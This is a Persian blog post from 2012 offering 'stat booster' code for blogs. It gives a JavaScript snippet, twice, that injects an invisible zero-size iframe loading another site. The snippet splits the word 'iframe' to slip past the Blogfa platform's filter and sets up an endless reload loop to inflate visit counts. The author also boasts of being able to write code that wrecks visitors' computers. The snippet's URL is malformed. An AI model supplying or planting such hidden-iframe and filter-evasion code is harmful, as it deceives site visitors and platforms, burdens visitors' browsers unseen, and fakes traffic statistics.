کد افزایش امار وبلاگ

کد افزایش امار وبلاگ

کد افزایش امار وبلاگ

کد افزایش امار وبلاگ

دانلودسرا

خوش آمدید
اخبار:

نویسندگان
مطالب تصادفی
کد افزایش امار وبلاگ

کد افزایش آمار وبلاگ

بازدید : 30575 تاریخ : پنجشنبه 31 فروردين 1391زمان : 14:43
 

بعضی ها فکر می کنن که داخل اینترنت هر کدی که هست خوبه ولی فکر نمی کنن که بعضی ها برای افزایش آمار بازدید خودشون دارن این کد ها رو مینویسن.

مثلا در کدی که اگر داخل اینترنت کد افزایش آمار رو سرچ کنین چندین سایت کد ساعتی رو بهتون میدن که اینو بهتون میده ولی در این سایت ها یا وبلاگ ها که یکیشون اینه: http://www.gotomoney.mihanblog.com کدی  رو درست کرده و داخل قالبش بیشتر از 100 تا کد iframe که داخل این کد یه سایت دیگه داخل وبلاگش باز میشه رو گذاشته و بعد با این عنوانی که منم گذاشتم کدی رو درست کرده که همون کد iframe رو کنار یه کد ساعت گذاشته که به وبلاگ خودش وصل میشه و با اون انگار یه 200 تا سایتی رفتی.

من هم میتونم این کار رو کنم ولی چه فایده داره؟ من هر چی باشه آدمم و کدهایی می تونم بسازم که کل کامپیوترتون رو نابود کنه مثلا دستگاه سی دی خوان کامپیوترتون رو در میاره و ویروس وارد کامپیوترتون می کنه و خیلی کار های وحشت ناک دیگه که اگه بگم خیلی ها دوست دارن یاد بگین.

امروز یه نفر از دوستانم از خواست که کد افزایش آمار رو بهش بدم. منم گشتم دنبالش و پیداش کردم. از دوستم عذر می خوام که اینو می گم ولی اون کد ساعتی که گفتم دارم قدیما فکر می کردم این واقعی که البته مال سه چهار ماه پیش بود که چیزی بلد نبودم. ولی در هر حال ما کد نویسا کم نمیاریم یه کد برات درست کردم که داخل این کد من یه صفحه جدید داخل وب خودم درست کردم که آدرس وبلاگتو در قالب کد iframe گذاشتم توش و بعد کد زیر رو اگه تو هم بذاری تو وبلاگت هر کس بیاد تو وبلاگت از اون صفحه میره تو وبلاگت و از وبلاگت میره تو صفحه و همینطور تا قیام قیامت ادامه داره. البته کلمه iframe در بلاگفا یه جورایی فیلتر شده ولی بازم ما کدنویسا کم نمیاریم و کلمه iframe رو با استفاده از جاوا اسکریپت تجزیه کردم و داخلش کلمه iframe رو به دو کلمه ifr و  ame تقسیم کردم تا دوتاش پیش هم نباشه و سیستم بلاگفا نفهمه. ولی با وجود این استفاده نکنی بهتره. البته بعضی از مرورگر ها وقتی اینجوری باشه که صفحه ای لود شدنش تموم نشه (دقیقا مثل چیزی که طراحی کردم) از ادامه دادنش جلو گیری می کنه. حداقل فایرفاکس که اینجوریه. در ضمن این کد تا اونجایی که میدونم در لیست سیاه گوگل قرار نمی گیره چون کد iframe کاملا مجازه اما خیلی ها استفاده از این کد رو زیاد خوب نمی دونن حالا چرا نمی دونم.

 

 این کد را در قالب وبلاگ خود قراردهید  <script type="text/javascript">document.write('<center><ifr');  document.write ('ame width="0px" height="0px"  src="http://moisrex..com/" style="border:  0px;"');document.write (' border="0"  scrolling="no"></ifr');document.write  ('ame>');</script>    

 

 

 

 

این کد هم برای افزایش امار بازدید هست <script type="text/javascript">document.write('<center><ifr');  document.write ('ame width="0px" height="0px"  src="http://moisrex..com/" style="border:  0px;"');document.write (' border="0"  scrolling="no"></ifr');document.write('ame>');</script>



نظرات

برای دیدن نظرات بیشتر روی شماره صفحات در زیر کلیک کنید

نام
آدرس ایمیل
وب سایت/بلاگ
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

آپلود عکس دلخواه:







مطالب مرتبط
پنل کاربری
نام کاربری
رمز عبور
عضویت سریع
نام کاربری
رمز عبور
تکرار رمز
ایمیل
کد تصویری
تبادل لینک هوشمند

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان دانلودسرا و آدرس djsina3.LXB.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.






درباره ی سایت
به وبلاگ من خوش آمدید